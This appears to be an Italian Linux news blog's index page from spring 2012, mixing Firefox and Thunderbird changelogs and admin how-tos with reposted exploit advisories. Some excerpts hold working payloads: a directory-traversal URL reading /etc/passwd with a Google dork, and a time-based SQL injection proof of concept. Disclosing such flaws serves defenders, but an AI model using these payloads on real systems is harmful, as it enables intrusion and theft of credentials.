Mozilla Firefox 12.0 Denial Of Service Exploit

5 maggio 2012 - Fonte: http://www.mondounix.com 
Title: Mozilla Firefox <=12.0 Denial Of Service Exploit
Author: L20ot - l20ot[at]yahoo[dot]com
Software Link: http://www.mozilla-europe.org/en/firefox/
Version: 12.0 - lastversion
Tested on: Windows 7 x32\x64
Description: visiting this php page you'll get an instant crash of Firefox
Greetz: nimaarek & MOH3NCODEr [inoob team]
 
 
 _        _______  _______  _______ _________
( \      / ___   )(  __   )(  ___  )\__   __/
| (      \/   )  || (  )  || (   ) |   ) (   
| |          /   )| | /   || |   | |   | |   
| |        _/   / | (/ /) || |   | |   | |   
| |       /   _/  |   / | || |   | |   | |   
| (____/\(   (__/\|  (__) || (___) |   | |   
(_______/\_______/(_______)(_______)   )_(   
 
<html>
<title>FF...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , ,

Thunderbird (Icedove) 12.0.1

2 maggio 2012 - Fonte: http://www.mondounix.com

Thunderbird

E' stato rilasciato il nuovo client email mozilla Thunderbird (Icedove) 12.0.1

Changelog :

* Fix various issues relating to new mail notifications and filtering on POP3 based accounts
* Fixes an occasional startup crash seen in TB 12.0
* Fixes an issue with corrrupted message bodies when using movemail

Link al sito italiano

...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , ,

Firefox (Iceweasel) 12.0

2 maggio 2012 - Fonte: http://www.mondounix.com

Firefox

E' stata rilasciata la nuova versione del browser Mozilla Firefox (Iceweasel) 12.0 .

Changelog :

* Windows: Firefox is now easier to update with one less prompt (User Account Control)
* Page Source now has line numbers
* Line breaks are now supported in the title attribute
* Improvements to "Find in Page" to center search result
* URLs pasted into the download manager window are now automatically downloaded
* Support for the text-align-last CSS property has been added
* Various security fixes
* Some TinyMCE-based editors failed to load (739141)
* OS X: WebGL performance may be degraded on some hardware...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , ,

Linux / Unix : Aprire ed estrarre file rar con unrar

2 maggio 2012 - Fonte: http://www.mondounix.com

Installare unrar

Per sistemi Debian / Ubuntu che utilizzano apt-get eseguire il seguente comando :

# apt-get install unrar

Per sistemi Fedora / CentOS / RHEL che utilizzano yum eseguire il seguente comando :

# yum install unrar

Per sistemi FreeBSD / BSD based eseguire il seguente comando :

# pkg_add -v -r unrar

In alternativa si possono utilizzare i sorgenti disponibili al sito

Esempio :

# wget http://www.rarlab.com/rar/rarlinux-4.1.1.tar.gz
# tar xzf rarlinux-4.1.1.tar.gz
# cd rar
# ./unrar

Utilizzo del comando unrar

Per estrarre il file.rar nella directory corrente eseguire il seguente comando :

# unrar e file.rar

Per...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , ,

STRATO Newsletter Manager Directory Traversal

1 maggio 2012 - Fonte: http://www.mondounix.com

STRATO Newsletter Manager is vulnerable against Directory Traversal

Vendor: www.strato-cgi.de

Google Dork: inurl:"newsletter.php.cgi"

Exploit:

http://server/cgi-bin/newsletter.php.cgi?PHPSESSID=af92ed633ae0d06d1e24d22520f709f7&action=nl_show&nl=../../../../../../../../../../../../../../etc/passwd

Greetz Zero X

...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , ,

[GNU/Linux] Come configurare le variabili d’ambiente

30 aprile 2012 - Fonte: http://matteocappelli.wordpress.com
Una variabile è una piccola parte della memoria RAM identificata da un nome e in grado di contenere dei valori (nomi, date, ...). Nel momento in cui un utente definisce una nuova variabile, il sistema associa al nome di tale variabile un indirizzo di memoria nel quale viene memorizzato il valore indicato. Per definire una variabile è sufficiente usare la seguente sintassi: [...]...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , ,

PHP Ticket System Beta 1 (index.php p parameter) SQL Injection

25 aprile 2012 - Fonte: http://www.mondounix.com

# Exploit Title: PHP Ticket System Beta 1 'p' SQL Injection
# Date: 04/16/12
# Author: G13
# Twitter: @g13net
# Software Site: http://sourceforge.net/projects/phpticketsystem/
# Version: Beta 1
# Category: webapp (php)
#

##### Description #####

PHP Ticket System is a small PHP MySQL trouble ticket or work ordersystem that is a work in progress.

##### Vulnerability #####

The 'p' parameter on index.php is vulnerable to SQL Injection.

A user must be signed in to perform this attack.

##### Exploit #####

http://localhost/index.php?p=[SQLi]&id=211&_=1334627588812

##### PoC #####

http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812

#####...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , ,

WebCalendar 1.2.4 Remote Code Executionn Exploit

24 aprile 2012 - Fonte: http://www.mondounix.com 
<?php
 
/*
    -----------------------------------------------------------------------
    WebCalendar <= 1.2.4 (install/index.php) Remote Code Executionn Exploit
    -----------------------------------------------------------------------
 
    author..........: Egidio Romano aka EgiX
    mail............: n0b0d13s[at]gmail[dot]com
    software link...: https://sourceforge.net/projects/webcalendar/
 
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , ,

Liferay 6.0.x Webdav File Reading Vulnerability

23 aprile 2012 - Fonte: http://www.mondounix.com

Specially crafted webdav request allows reading of local files on liferay 6.0.x

Description:

Liferay Portal is an enterprise portal written in Java

By creating a specially crafted webdav request that contains an external entity it is possible to read files from a liferay server.
and echo these back in the response. You could use this for instance to download configuration files containing database passwords or ssh keys located in a users home folder

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-24562-proof

http://www.exploit-db.com/sploits/18763.tar.gz

Systems affected:

Liferay 6.0.5 ce is confirmed to be vulnerable
Liferay 6.0.6 ce is confirmed to be vulnerable

Vendor...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , ,

OpenSolaris / Openindiana : Installare , disinstallare ed aggiornare pacchetti

23 aprile 2012 - Fonte: http://www.mondounix.com

Test effettuati su server Openindiana 5.11 oi_151a3 i386 e OpenSolaris 5.11 11.0 i386

# OPENINDIANA

# uname -a
SunOS openindiana 5.11 oi_151a3 i86pc i386 i86pc Solaris

Verifica dei repository installati ed aggiornamento del database dei pacchetti

# pkg publisher
PUBLISHER TYPE STATUS URI
openindiana.org origin online http://pkg.openindiana.org/dev/

# pkg refresh --full

Verifica della disponibilità di aggiornamenti ed aggiornamento dei pacchetti indicati

# pkg list -u

# pkg update NOME_PACCHETTO

Verifica della disponibilità di pacchetti da installare e relativa installazione

# pkg list -a | grep lynx
web/browser/lynx ...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , ,